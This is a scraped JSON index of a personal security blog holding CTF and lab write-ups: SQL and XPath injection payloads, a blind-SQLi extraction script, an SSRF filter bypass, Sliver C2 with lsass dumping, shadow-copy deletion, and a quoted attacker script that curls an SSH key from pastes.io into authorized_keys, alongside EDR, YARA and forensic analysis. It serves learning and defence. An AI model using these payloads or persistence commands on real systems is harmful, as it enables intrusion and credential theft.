-v 1.19.0 -u \u0026#34;;cat /root/root.txt;\u0026#34; root.txt 13630834b0c9c6f122557097788d8e25\n","date":"2024-02-28T22:44:28+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb_surveillance/","title":"Htb_surveillance"},{"content":"SOC Lab Setup Introduction This is my documentation of a lab setup for a SOC (Security operation center) environment. I decided to pursue this project with the aim of learning about endpoint detection and response. SOC analysis is more about blue teaming and detecting threats in an environment.\nAs is did this i followed steps from this blog post \u0026raquo; here . Credits!!\nSummary Setup Intrusion Blocking attacks Tuning False Positives Setup Setup of vms(ubuntu server and windows) NOTE: im using a computer with the following specs:\n8gb RAM intel i5 500gb hard disk You might want to allocate different amount of resources for your vms depending on the specs of your hardware. As for me my specs constrained me , my vms were slow esp the windows vm. I allocated 2gb for the windows vm and 1gb for the ubuntu server.\nInstalling of limacharlie sensor LimaCharlie is a very powerful “SecOps Cloud Platform” . Check it out \u0026raquo; here\nC2 (command and control) For the C2 i used sliver-server by bishop fox\n1 Sliver is an open source cross-platform adversary emulation/red team framework, it can be used by organizations of all sizes to perform security testing I created a C2 payload and dropped it in the windows vm.\nUsing the implant we can access the windows vm from the ubuntu server attack machine.\nBelow is a list of running processes\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 . ├── [0] [System Process] │ └── [4] System │ ├── [1444] Memory Compression │ ├── [72] Registry │ └── [528] smss.exe ├── [632] csrss.exe ├── [732] csrss.exe ├── [776] wininit.exe │ ├── [864] services.exe │ │ ├── [2160] Sysmon64.exe │ │ ├── [3708] svchost.exe │ │ ├── [1348] svchost.exe │ │ ├── [1508] svchost.exe │ │ ├── [1668] svchost.exe │ │ │ └── [5768] audiodg.exe │ │ ├── [2152] vm3dservice.exe │ │ │ └── [2284] vm3dservice.exe │ │ ├── [1128] svchost.exe │ │ │ ├── [648] taskhostw.exe │ │ │ ├── [1960] sihost.exe │ │ │ ├── [2436] CompatTelRunner.exe │ │ │ │ ├── [2488] conhost.exe │ │ │ │ └── [1236] CompatTelRunner.exe │ │ │ ├── [2520] MicrosoftEdgeUpdate.exe │ │ │ └── [3460] taskhostw.exe │ │ ├── [2124] vmtoolsd.exe │ │ ├── [4368] svchost.exe │ │ ├── [3500] SecurityHealthService.exe │ │ ├── [6548] svchost.exe │ │ ├── [1636] svchost.exe │ │ ├── [1772] svchost.exe │ │ ├── [1788] svchost.exe │ │ ├── [3100] SgrmBroker.exe │ │ ├── [1304] svchost.exe │ │ ├── [2168] VGAuthService.exe │ │ ├── [2132] rphcp.exe │ │ ├── [628] svchost.exe │ │ ├── [896] spoolsv.exe │ │ ├── [992] svchost.exe │ │ │ ├── [1284] ShellExperienceHost.exe │ │ │ ├── [1580] RuntimeBroker.exe │ │ │ ├── [3240] BackgroundTransferHost.exe │ │ │ ├── [4376] backgroundTaskHost.exe │ │ │ ├── [5572] RuntimeBroker.exe │ │ │ ├── [740] unsecapp.exe │ │ │ ├── [1156] dllhost.exe │ │ │ ├── [5608] SearchApp.exe │ │ │ ├── [6004] RuntimeBroker.exe │ │ │ ├── [4352] RuntimeBroker.exe │ │ │ ├── [2476] WmiPrvSE.exe │ │ │ ├── [3680] WmiPrvSE.exe │ │ │ ├── [3892] TextInputHost.exe │ │ │ ├── [3932] StartMenuExperienceHost.exe │ │ │ ├── [4488] MoUsoCoreWorker.exe │ │ │ ├── [1256] RuntimeBroker.exe │ │ │ ├── [3552] smartscreen.exe │ │ │ ├── [5064] SearchApp.exe │ │ │ └── [1216] TiWorker.exe │ │ ├── [2984] dllhost.exe │ │ ├── [2092] TrustedInstaller.exe │ │ ├── [2376] svchost.exe │ │ ├── [3912] SearchIndexer.exe │ │ ├── [5652] svchost.exe │ │ ├── [1172] svchost.exe │ │ │ ├── [3152] ctfmon.exe │ │ │ └── [4800] CompatTelRunner.exe │ │ │ └── [2944] conhost.exe │ │ ├── [1520] svchost.exe │ │ ├── [1532] svchost.exe │ │ ├── [1832] msdtc.exe │ │ ├── [736] svchost.exe │ │ ├── [4852] sppsvc.exe │ │ ├── [5172] svchost.exe │ │ ├── [1292] svchost.exe │ │ ├── [1628] svchost.exe │ │ ├── [1640] svchost.exe │ │ └── [2120] svchost.exe │ ├── [876] lsass.exe │ └── [1016] fontdrvhost.exe ├── [784] winlogon.exe │ ├── [1008] fontdrvhost.exe │ └── [1040] dwm.exe ├── [3328] explorer.exe │ ├── [3512] SecurityHealthSystray.exe │ ├── [3880] vmtoolsd.exe │ ├── [4272] OneDrive.exe │ └── [6984] cmd.exe │ ├── [1696] CONTINUED_CARRY.exe │ └── [3612] conhost.exe ├── [6808] setup.exe │ ├── [7032] setup.exe │ └── [3008] MicrosoftEdgeUpdate.exe └── [6952] Microsoft.SharePoint.exe ⚠️ Security Product(s): Sysmon64, Windows Smart Screen Inturn we can observe the malware in the limacharlie telementery. We can detect our maliciuos process apart from the the legitimate processes. we can also view it network connections.\nIntrusion I can steal creds by dumping lsass.exe from the windows box memory to my attack machine\nThis will generate telementery in limacharkie that we can search with \u0026ldquo;SENSITIVE_PROCESS_ACCESS\u0026rdquo;\nWe can create an edr rule to alert once this type of activity occurs\n1 2 3 4 event: SENSITIVE_PROCESS_ACCESS op: ends with path: event/*/TARGET/FILE_PATH value: lsass.exe This rule will detect \u0026ldquo;SENSITIVE_PROCEE_ACCESS\u0026rdquo; with process being \u0026ldquo;lsass.exe\u0026rdquo;\nTo respond we use:\n1 2 - action: report name: LSASS access This will generate a detection report that we can view in the detections menu.\nBlocking attacks Here we are going to craft rules to take action when detections are made\nin thbis i ran thsi command :\n1 vssadmin delete shadows /all Which will delete volume shadow copies. This is just an example of a process that may indicate suspicious activity on a system\nThen we craft an Response rule:\nThis rule will terminate the parent process when it is detected.\n1 2 3 4 5 6 - action: report name: vss_deletion_kill_it - action: task command: - deny_tree - \u0026lt;\u0026lt;routing/parent\u0026gt;\u0026gt; This hung shell is an indication that it worked succesfully\nTuning False Positives Here we craft a false positive detection rule. This is whereby we can prevent alerts when normal system processes are run, thus causing alot of noise.\nI crafted to detect when whoami.exe is run. This is just an example.\n1 2 3 4 5 6 7 8 9 10 11 op: and rules: - op : is path: cat value: Whoami Utility Execution - op: is path: detect/event/FILE_PATH value: C:\\Windows\\system32\\whoami.exe - op: is path: detect/event/COMMAND_LINE value: \u0026#39;\u0026#34;C:\\Windows\\system32\\whoami.exe\u0026#34;\u0026#39; After testing it:\nIt works!!\nIf i run whoami when the rule is enabled i get no alaert, however whn i disable it i get an alert.\nAutomated Yara Scanning 1 2 YARA is a tool primarily used for identifying and classifying malware based on textual or binary patterns. It allows researchers and security professionals to craft rules that describe unique characteristics of specific malware families or malicious behaviors. There are well crafted rules for sliver (our c2 server) on the internet. We will use this \u0026raquo; here\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 ule sliver_github_file_paths_function_names { meta: author = \u0026#34;NCSC UK\u0026#34; description = \u0026#34;Detects Sliver Windows and Linux implants based on paths and function names within the binary\u0026#34; strings: $p1 = \u0026#34;/sliver/\u0026#34; $p2 = \u0026#34;sliverpb.\u0026#34; $fn1 = \u0026#34;RevToSelfReq\u0026#34; $fn2 = \u0026#34;ScreenshotReq\u0026#34; $fn3 = \u0026#34;IfconfigReq\u0026#34; $fn4 = \u0026#34;SideloadReq\u0026#34; $fn5 = \u0026#34;InvokeMigrateReq\u0026#34; $fn6 = \u0026#34;KillSessionReq\u0026#34; $fn7 = \u0026#34;ImpersonateReq\u0026#34; $fn8 = \u0026#34;NamedPipesReq\u0026#34; condition: (uint32(0) == 0x464C457F or (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)) and (all of ($p*) or 3 of ($fn*)) } rule sliver_proxy_isNotFound_retn_cmp_uniq { meta: author = \u0026#34;NCSC UK\u0026#34; description = \u0026#34;Detects Sliver implant framework based on some unique CMPs within the Proxy isNotFound function. False positives may occur\u0026#34; strings: $ = {C644241800C381F9B3B5E9B2} $ = {8B481081F90CAED682} condition: (uint32(0) == 0x464C457F or (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)) and all of them } rule sliver_nextCCServer_calcs { meta: author = \u0026#34;NCSC UK\u0026#34; description = \u0026#34;Detects Sliver implant framework based on instructions from the nextCCServer function. False positives may occur\u0026#34; strings: $ = {4889D3489948F7F94839CA????48C1E204488B0413488B4C1308} condition: (uint32(0) == 0x464C457F or (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)) and all of them } We will also need a rule to detect when yara is matched.\n1 2 3 4 5 6 7 8 event: YARA_DETECTION op: and rules: - not: true op: exists path: event/PROCESS/* - op: exists path: event/RULE_NAME From here we can create rules to automatically scan new executables and those in the downloads directory.\nWith this we can uleash the full power of the EDR to scan and detect malicious processes and files\nUntil next time!! HACK THE PLANET\n","date":"2024-02-06T15:57:25+03:00","image":"https://f0rk3b0mb.github.io/cover/soc_lab.jpg","permalink":"https://f0rk3b0mb.github.io/p/soc_analyst_lab/","title":"Soc_analyst_lab"},{"content":"Writeup for challenges in knightctf 2024\nweb kitty Tetanus is a serious, potentially life-threatening infection that can be transmitted by an animal bite.\nN:B: There is no need to do bruteforce.\nHere its obvious that it is sqli , login bypas to be precise\n1 payload: \u0026#34; or 1=1-- - since it was in json we you had to excape the first double-quote\nREADME This challenge entailed bypass a 403 response to be able to read the flag. The methos to exploit this is by using special http headers. see here\nUsing burp intruder , we get the flag\nGain access 1 For this challenge we are given a login page. It obvious the vuln is login bypass.\nInspecting the page source code we can see a comment with the root email \u0026ldquo;root@knightctf.com\u0026rdquo;\n1 payload : root@knightctf.com\u0026#39;-- - Gain access 2 For this challnege we are also given a login page. Viewing the page source we can see a comment that indicated there is a path notesssssss.txt. Visiting it\u0026hellip;\n1 2 I\u0026#39;ve something for you. Think..... root@knightctf.com:d05fcd90ca236d294384abd00ca98a2d The hash is md5 since it has a length of 32. Using this \u0026raquo; site we find the password as \u0026ldquo;letmein_kctf2024\u0026rdquo;\nLogging in we get a OTP verification page. It is vulnerable to sqli\n1 payload : anything\u0026#39; or 1=1-- - We then get access to the dashboard\nI got stuck here , will update when the ctf ends. :)\nUpdate:\nAfter you get the password , there is ana OTP page . The page also has an option to resend otp which requires you to enter an email. If we eneter the email roor@knightctf.com. That we had earlier we can see that it accepts it. Note: I had tries this methos earlier but i used the wrong format.\nSo you can send several email as an array []\n1 2 3 4 { \u0026#34;email\u0026#34;: [\u0026#34;root@knightctf.com\u0026#34;,\u0026#34;attacker@email.com\u0026#34;] } This will send the OTP code to both emails. Using the OTP code we get the flag\nCREDIT: @T3l3sc0p3\nNetworking For the networking challs check out my teammates writeups on them \u0026raquo;\nhere ","date":"2024-01-20T22:14:59+03:00","image":"https://f0rk3b0mb.github.io/cover/knightctf.jpg","permalink":"https://f0rk3b0mb.github.io/p/knightctf_2024/","title":"Knightctf_2024"},{"content":"Whats my password solve script category : web difficulty: easy\nVulnerability is error based blind sqli\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 import requests import string import json url=\u0026#34;http://whats-my-password-web.chal.irisc.tf/api/login\u0026#34; #found_char=[\u0026#39;i\u0026#39;, \u0026#39;r\u0026#39;, \u0026#39;i\u0026#39;, \u0026#39;s\u0026#39;, \u0026#39;c\u0026#39;, \u0026#39;t\u0026#39;, \u0026#39;f\u0026#39;, \u0026#39;{\u0026#39;, \u0026#39;m\u0026#39;, \u0026#39;y\u0026#39;, \u0026#39;_\u0026#39;, \u0026#39;p\u0026#39;, \u0026#39;4\u0026#39;, \u0026#39;2\u0026#39;, \u0026#39;2\u0026#39;,\u0026#39;W\u0026#39;, \u0026#39;0\u0026#39;, \u0026#39;R\u0026#39;, \u0026#39;D\u0026#39;, \u0026#39;_\u0026#39;, \u0026#39;1\u0026#39;, \u0026#39;S\u0026#39;, \u0026#39;_\u0026#39;, \u0026#39;S\u0026#39;, \u0026#39;Q\u0026#39;, \u0026#39;l\u0026#39;, \u0026#39;1\u0026#39;,\u0026#39;}\u0026#39;] found_char=[] headers={\u0026#34;Content-Type\u0026#34;:\u0026#34;application/json\u0026#34;} def main(): for x in range(len(found_char),50): for i in string.printable[:-6]: username = \u0026#34;skat\u0026#34; password = f\u0026#34;\\\u0026#34; or 1=(IF(SUBSTR((SELECT password from users where username=\u0026#39;skat\u0026#39;),{x},1)=\u0026#39;{i}\u0026#39;, 1,2))-- -\u0026#34; data = {\u0026#34;username\u0026#34;: username, \u0026#34;password\u0026#34;: password} sdata=json.dumps(data) r=requests.post(url,data=sdata,headers=headers) if \u0026#34;root\u0026#34; in r.text: found_char.append(i) print(found_char) break main() flag: irisctf{my_p422W0RD_1S_SQl1} ","date":"2024-01-06T18:29:32+03:00","image":"https://f0rk3b0mb.github.io/cover/iris.png","permalink":"https://f0rk3b0mb.github.io/p/irisctf_whats_my_password/","title":"Irisctf_whats_my_password"},{"content":"Writeup of htb sherlock Meerkat rating: easy\nWe believe our Business Management Platform server has been compromised. Please can you confirm the name of the application running? we can filter the meerkat-alerts.json with\u0026hellip;\n1 2 3 4 cat meerkat-alerts.json |jq |grep signature | grep -v python the bmp name is in the signature ans: Bonitasoft\nWe believe the attacker may have used a subset of the brute forcing attack category - what is the name of the attack carried out? From the meerkat-alerts.json and from pacap file we can see that there was alot of alerts on python-requests and we can see the requests tested different creds. This is possible Credential Stuffing\nans: Credential Stuffing\nDoes the vulnerability exploited have a CVE assigned - and if so, which one? Here use the same command as question1 , the cve is in the signature\nans: CVE-2022-25237\nWhich string was appended to the API URL path to bypass the authorization filter by the attacker\u0026rsquo;s exploit? in this case i used tshark to analyse the pcap.\n1 2 3 4 tshark -r meerkat.pcap -Y \u0026#34;http.request.method == POST\u0026#34; -T fields -e http.request.uri | grep -i api filter post requests , get the url path and grep for the api endpoints i18ntranslation\nHow many combinations of usernames and passwords were used in the credential stuffing attack? here we filter post requests, the we remove \u0026ldquo;username=install\u0026amp;password=install\u0026amp;_l=en\u0026rdquo; , i also removed \u0026ldquo;/bonita/API/portal/page/;i18ntranslation\u0026rdquo; and \u0026ldquo;/bonita/API/pageUpload;i18ntranslation?action=add\u0026rdquo; which were not login requests then pipe the output to uniq\n1 2 tshark -r meerkat.pcap -Y \u0026#34;http.request.method == POST\u0026#34; -T fields -e http.request.uri -e http.file_data | grep -v \u0026#34;username=install\u0026amp;password=install\u0026amp;_l=en\u0026#34; | grep -v \u0026#34;/bonita/API/portal/page/;i18ntranslation\u0026#34; | grep -v \u0026#34;/bonita/API/pageUpload;i18ntranslation?action=add\u0026#34; | uniq | wc -l ans: 56\nWhich username and password combination was successful? From the query above without uniq , the last combination has a different http.file_data , yoll have to check through wireshark but the ans is \u0026hellip;\nans: seb.broom@forela.co.uk:g0vernm3nt\nIf any, which text sharing site did the attacker utilise? As i was analysing the pcap using this query we can get the full uri. the url is part of parameters\n1 tshark -r meerkat.pcap -T fields -e http.request.full_uri | uniq ans: pastes.io\nPlease provide the filename of the public key used by the attacker to gain persistence on our host. Visiting the url we get a bash script with the following content\u0026hellip; hxxps[://]pastes[.]io/raw/bx5gcr0et8\n1 2 3 #!/bin/bash curl https://pastes.io/raw/hffgra4unv \u0026gt;\u0026gt; /home/ubuntu/.ssh/authorized_keys sudo service ssh restart ans: hffgra4unv\nCan you confirmed the file modified by the attacker to gain persistence? see above\nans: /home/ubuntu/.ssh/authorized_keys\nCan you confirm the MITRE technique ID of this type of persistence mechanism? this technique of using ssh authorized keys has id T1098.004. You can get this by visiting mitre website or googling or use chatgpt idc.\nans: T1098.004\n","date":"2023-12-20T14:43:14+03:00","permalink":"https://f0rk3b0mb.github.io/p/htb-sherlock-meerkat/","title":"Htb Sherlock Meerkat"},{"content":"Thm Investigating with splunk This room is for pactice on the Jnuior Penetration tester path on TryHackMe \u0026raquo;\u0026gt; here\nHow many events were collected and Ingested in the index main? 1 2 3 index=\u0026#34;main\u0026#34; ans: 12256 On one of the infected hosts, the adversary was successful in creating a backdoor user. What is the new username? 1 2 3 index=main EventID=\u0026#34;4720\u0026#34; ans: A1berto On the same host, a registry key was also updated regarding the new backdoor user. What is the full path of that registry key? 1 2 3 4 index=main Hostname=\u0026#34;Micheal.Beaven\u0026#34; EventID=\u0026#34;12\u0026#34; A1berto ans : HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\A1berto Examine the logs and identify the user that the adversary was trying to impersonate. 1 2 3 4 5 6 7 The attacker account is called A1berto the real account is Alberto with an \u0026#39;L\u0026#39; index=main (User section) ans : Alberto What is the command used to add a backdoor user from a remote computer? 1 2 3 4 index=main EventID=\u0026#34;4688\u0026#34; ans: \u0026#34;C:\\windows\\System32\\Wbem\\WMIC.exe\u0026#34; /node:WORKSTATION6 process call create \u0026#34;net user /add A1berto paw0rd1\u0026#34; How many times was the login attempt from the backdoor user observed during the investigation? 1 2 3 4 5 6 index=main EventID=\u0026#34;4624\u0026#34; \u0026lt;\u0026lt; succesful logon\u0026gt;\u0026gt; index=main EventID=\u0026#34;4625\u0026#34; \u0026lt;\u0026lt;unsuccesful logon\u0026gt;\u0026gt; both return no results ans : 0 What is the name of the infected host on which suspicious Powershell commands were executed? 1 2 3 index=main powershell ans : James.browne PowerShell logging is enabled on this device. How many events were logged for the malicious PowerShell execution? 1 2 3 index=main EventID=\u0026#34;4103\u0026#34; ans: 79 An encoded Powershell script from the infected host initiated a web request. What is the full URL? 1 2 3 4 5 6 from question 7 check the first event base64 decode and use decode text utf-16le using cyberchef. The url is base64 encoded . Youll also have to defang the url ans: hxxp[://]10[.]10[.]10[.]5/news[.]php ","date":"2023-12-03T11:56:27+03:00","image":"https://f0rk3b0mb.github.io/cover/thm.svg","permalink":"https://f0rk3b0mb.github.io/p/thm_splunk/","title":"Thm_splunk"},{"content":"Wazuh This is a writeup of Wazuh module on tryhackme. This is in the SOC Level 1 path. \u0026raquo; here ENjoy :)\nWazuh is an opensource XDR and SIEM service\nIntro 1 2 3 4 5 6 7 8 9 10 11 12 13 1. When was Wazuh released? 2015 2. What is the term that Wazuh calls a device that is being monitored for suspicious activity and potential security threats? agent 3. Lastly, what is the term for a device that is responsible for managing these devices? manager Wazuh agents 1 2 3 4 5 6 7 8 9 1. How many agents does this Wazuh management server manage? 2 2. What are the status of the agents managed by this Wazuh management server? disconnected Wazuh Vulnerability Assessment \u0026amp; Security Events 1 2 3 4 1. How many \u0026#34;Security Event\u0026#34; alerts have been generated by the agent \u0026#34;AGENT-001\u0026#34;? 196 Collecting Windows Logs with Wazuh 1 2 3 4 5 6 7 8 9 1. What is the name of the tool that we can use to monitor system events? sysmon 2. What standard application on Windows do these system events get recorded to? event viewer Collecting Linux Logs with Wazuh 1 2 3 4 1. What is the full file path to the rules located on a Wazuh management server? /var/ossec/ruleset/rules Auditing Commands on Linux with Wazuh 1 2 3 4 5 6 7 8 9 1. What application do we use on Linux to monitor events such as command execution? auditd 2. What is the full path \u0026amp; filename for where the aforementioned application stores rules? /etc/audit/ruled.d/audit.rules Wazuh API 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 1. What is the name of the standard Linux tool that we can use to make requests to the Wazuh management server? curl 2. What HTTP method would we use to retrieve information for a Wazuh management server API? GET 3. What HTTP method would we use to perform an action on a Wazuh management server API? PUT 4. Use the API console to find the Wazuh server\u0026#39;s version. v4.2.5 Generating Reports with Wazuh 1 2 3 4 1. Analyse the report. What is the name of the agent that has generated the most alerts? agent-001 ","date":"2023-11-25T08:48:38+03:00","image":"https://f0rk3b0mb.github.io/cover/thm.svg","permalink":"https://f0rk3b0mb.github.io/p/thm_wazuh/","title":"Thm_wazuh"},{"content":"Hackthebox - Hack the boo 2023 writeup HauntMart Category: web Rating: Easy\nThis challenge had a downloadable part , it was a web applicatio that allowed a user to register and login and add a product.\nTo get the flag we have to login as admin.\nThe is a /addAdmin route but it only accepts requests from localhost\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 @api.route(\u0026#39;/addAdmin\u0026#39;, methods=[\u0026#39;GET\u0026#39;]) @isFromLocalhost def addAdmin(): username = request.args.get(\u0026#39;username\u0026#39;) if not username: return response(\u0026#39;Invalid username\u0026#39;), 400 result = makeUserAdmin(username) if result: return response(\u0026#39;User updated!\u0026#39;) return response(\u0026#39;Invalid username\u0026#39;), 400 I Tries using X-Forwarded-For headers but it didnt work.\nIf you look closer at the code there is a function to send a request to fetch the manual from a url.\nThis vulnerability is called ssrf (server side request forgery) check more \u0026raquo;\u0026gt; here\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 def downloadManual(url): safeUrl = isSafeUrl(url) if safeUrl: try: local_filename = url.split(\u0026#34;/\u0026#34;)[-1] r = requests.get(url) with open(f\u0026#34;/opt/manualFiles/{local_filename}\u0026#34;, \u0026#34;wb\u0026#34;) as f: for chunk in r.iter_content(chunk_size=1024): if chunk: f.write(chunk) return True except: return False return False There is also a poor attempt of a filter for the url\n1 2 3 4 5 6 7 8 9 blocked_host = [\u0026#34;127.0.0.1\u0026#34;, \u0026#34;localhost\u0026#34;, \u0026#34;0.0.0.0\u0026#34;] def isSafeUrl(url): for hosts in blocked_host: if hosts in url: return False return True We can easily bypass this , there are many routed to localhost other that the ones listed there. You can check them out \u0026raquo;\u0026gt; here\nFor me this one worked:\nNOTE: you can get the port that the app is listenig from in therun.py , we have to make a request to /api/addAdmin to make our user admin\n1 2 http://127.0.1.3:1337/api/addAdmin?username=test We get the flag as : HTB{A11_55RF_5C4rY_p4tch_3m_411!}\n","date":"2023-10-27T08:52:15+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/hack_the_boo2023/","title":"Hack_the_boo2023"},{"content":"Thm owasp Command Injection Practical 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 What strange text file is in the website root directory? cmd: ls drpepper.txt How many non-root/non-service/non-daemon users are there? What user is this app running as? cmd: whoami www-data What is the user\u0026#39;s shell set as? What version of Ubuntu is running? cmd: lsb_release -a 18.04.4 Print out the MOTD. What favorite beverage is shown? cmd: cat /etc/update-motd.d/00-header DR PEPPER Broken Authentication Practical 1 2 3 4 5 6 7 8 9 10 11 12 What is the flag that you found in darren\u0026#39;s account? fe86079416a21a3c99937fea8874b667 What is the flag that you found in arthur\u0026#39;s account? d9ac0f7db4fda460ac3edeb75d75e16e Sensitive Data Exposure 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 What is the name of the mentioned directory? /assets Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data? webapp.db Use the supporting material to access the sensitive data. What is the password hash of the admin user? 6eea9b7ef19179a06954edd0f6c05ceb Crack the hash. What is the admin\u0026#39;s plaintext password? qwertyuiop Login as the admin. What is the flag? THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl} XML External Entity 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 What is the name of the user in /etc/passwd falcon Where is falcon\u0026#39;s SSH key located? /home/falcon/.ssh/id_rsa What are the first 18 characters for falcon\u0026#39;s private key MIIEogIBAAKCAQEA7b Broken Access Control (IDOR Challenge) 1 2 3 4 5 6 7 8 9 10 Look at other users notes. What is the flag? payload : http://10.10.145.127/note.php?note=0 flag{fivefourthree} Security Misconfiguration 1 2 3 4 5 6 7 8 Hack into the webapp, and find the flag! creds: pensive:PensiveNotes thm{4b9513968fd564a87b28aa1f9d672e17} XSS 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 Navigate to http://10.10.98.36/ in your browser and click on the \u0026#34;Reflected XSS\u0026#34; tab on the navbar; craft a reflected XSS payload that will cause a popup saying \u0026#34;Hello\u0026#34;. ThereIsMoreToXSSThanYouThink On the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address. ReflectiveXss4TheWin Then add a comment and see if you can insert some of your own HTML. HTML_T4gs On the same page, create an alert popup box appear on the page with your document cookies. W3LL_D0N3_LVL2 Change \u0026#34;XSS Playground\u0026#34; to \u0026#34;I am a hacker\u0026#34; by adding a comment and using Javascript. websites_can_be_easily_defaced_with_xss Insecure Deserialization 1 2 3 4 5 6 7 8 9 10 Who developed the Tomcat application? The Apache Software Foundation What type of attack that crashes services can be performed with insecure deserialization? denial of service Insecure Desirialization 1 2 3 4 5 6 7 8 9 10 11 1st flag (cookie value) THM{good_old_base64_huh} 2nd flag (admin dashboard) THM{heres_the_admin_flag} Insecure Deserialization - Code Execution 1 2 3 4 5 6 flag.txt 4a69a7ff9fd68 Components with know vulns 1 2 3 4 5 6 7 How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer) exploit : https://www.exploit-db.com/exploits/47887 1611 Insufficient Logging and Monitoring 1 2 3 4 5 6 7 8 9 10 What IP address is the attacker using? 49.99.13.16 What kind of attack is being carried out? brute force ","date":"2023-10-25T13:12:22+03:00","image":"https://f0rk3b0mb.github.io/cover/thm.svg","permalink":"https://f0rk3b0mb.github.io/p/thm_owasp/","title":"Thm_owasp"},{"content":"Blackhat Mea 2023 ctf writeup We participated this ctf as Chasing X fr334aks X L3v3l 6 and managed to get pos 178. It wasn\u0026rsquo;t easy. I Managed to solve the web challenge below.\nAuthy For this challenge we are provided with an api endpoint and challenge source\nAccording to the LoginController.go file we can create a user and login , the user password length should not be less than 6\nThe vulnerability occurs when the user passowrd value in the registration function is not the one being compared in the login function. To get the flag we have to login with a password of length \u0026lt; 6.\nThe vulnerable code:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 //registration if len(user.Password) \u0026lt; 6 { log.Error(\u0026#34;Password too short\u0026#34;) resp := c.JSON(http.StatusConflict, helper.ErrorLog(http.StatusConflict, \u0026#34;Password too short\u0026#34;, \u0026#34;EXT_REF\u0026#34;)) return resp } //login if len(password) \u0026lt; 6 { flag := os.Getenv(\u0026#34;FLAG\u0026#34;) res := \u0026amp;Flag{ Flag: flag, } resp := c.JSON(http.StatusOK, res) log.Info() return resp } With my vast ctf experience i could tell what i needed to do :)\nTHe logic is :\n1 2 3 4 5 user.Name := \u0026#34;😃\u0026#34; // Contains 1 emoji character lengthOfString := len(user.Name) // Length of the string (bytes) - 4 (UTF-8 encoding) lengthOfRuneSlice := len([]rune(user.Name)) // Length of rune slice (code points) - 1 So i sent the request for registration with the password as two smileys and login with the same password. In the backend the register will see a length of 8 and login will see a length of 2 thus solving the challenge\n1 2 3 4 5 curl -X POST -H \u0026#34;Content-Type: application/json\u0026#34; -d \u0026#39;{\u0026#34;Username\u0026#34;: \u0026#34;ping\u0026#34;, \u0026#34;Password\u0026#34;: \u0026#34;🤣🤣\u0026#34;, \u0026#34;Firstname\u0026#34;: \u0026#34;John\u0026#34;, \u0026#34;Lastname\u0026#34;: \u0026#34;Doe\u0026#34;}\u0026#39; http://af78671fe39ff1e0e18d2.playat.flagyard.com/registration curl -X POST -H \u0026#34;Content-Type: application/json\u0026#34; -d \u0026#39;{\u0026#34;Username\u0026#34;: \u0026#34;ping\u0026#34;, \u0026#34;Password\u0026#34;: \u0026#34;🤣🤣\u0026#34;}\u0026#39; http://af78671fe39ff1e0e18d2.playat.flagyard.com/login The ctf was great and see you in the next one\n","date":"2023-10-09T16:06:15+03:00","image":"https://f0rk3b0mb.github.io/cover/bh.png","permalink":"https://f0rk3b0mb.github.io/p/blackhat_mea_2023/","title":"Blackhat_mea_2023"},{"content":"Shehacks intervasity ctf 2023 This ctf onsite at usiu , nairobi . I particpated online.\nweb category\nGraph1 This was an easy chalenge that tested knowledge in graphql queries\nthe graphql endpoint was located at /graphql.\nfor more info on how to enumerate graphql \u0026raquo; here\nSo basicaly if we send the query below we get introspection on the grapql endpoint\n1 {__schema{types{name,fields{name}}}} You can then use \u0026raquo; here to visualize the schema\nremember to set the content-type to \u0026ldquo;appication/graphql\u0026rdquo; when sending the request\nFrom this we find out that there is a field known as getFlag. We can then run the query below to get the flag . It was base64 encoded , so we decode it to get the flag\nX marks the spot In this challenge we are given a web application login field , i tried sql injection at first an an error was thrown\n1 SimpleXMLElement::xpath(): Invalid predicate in \u0026lt;b\u0026gt;/var/www/html/backend.php This indicated that the appication is vulnerable to xpath injection\nyou can check the payloads \u0026raquo; hacktricks xpath\ni tried the payload\n1 \u0026#39;or 1=1 or\u0026#39; this is able to bypass login and i get the result\n1 {\u0026#34;username\u0026#34;:\u0026#34;admin\u0026#34;,\u0026#34;password\u0026#34;:\u0026#34;supersecret\u0026#34;,\u0026#34;api-key\u0026#34;:\u0026#34;api-admin-key\u0026#34;} to move laterally through accounts i used the following payload , i achieved this after after trying lots of payloads\n1 \u0026#39;or position()=3 or\u0026#39; by changing the number above we can basically login as different users , in this case 3 gets us the flag.\nPS i got first blood on this challenge :)\n1 {\u0026#34;username\u0026#34;:\u0026#34;ali\u0026#34;,\u0026#34;password\u0026#34;:\u0026#34;654321\u0026#34;,\u0026#34;api-key\u0026#34;:\u0026#34;flag{s0m30n3_n33ds_1npu7_v4l1d4t10n}\u0026#34;} secrets For this challenge you are provided with a signin page and you can also register.\nWe have to manipulate the cookie to become the admin user. For this i used the tool flask-unsign , you can get it \u0026raquo; here\n1 2 3 flask-unsign --decode --cookie 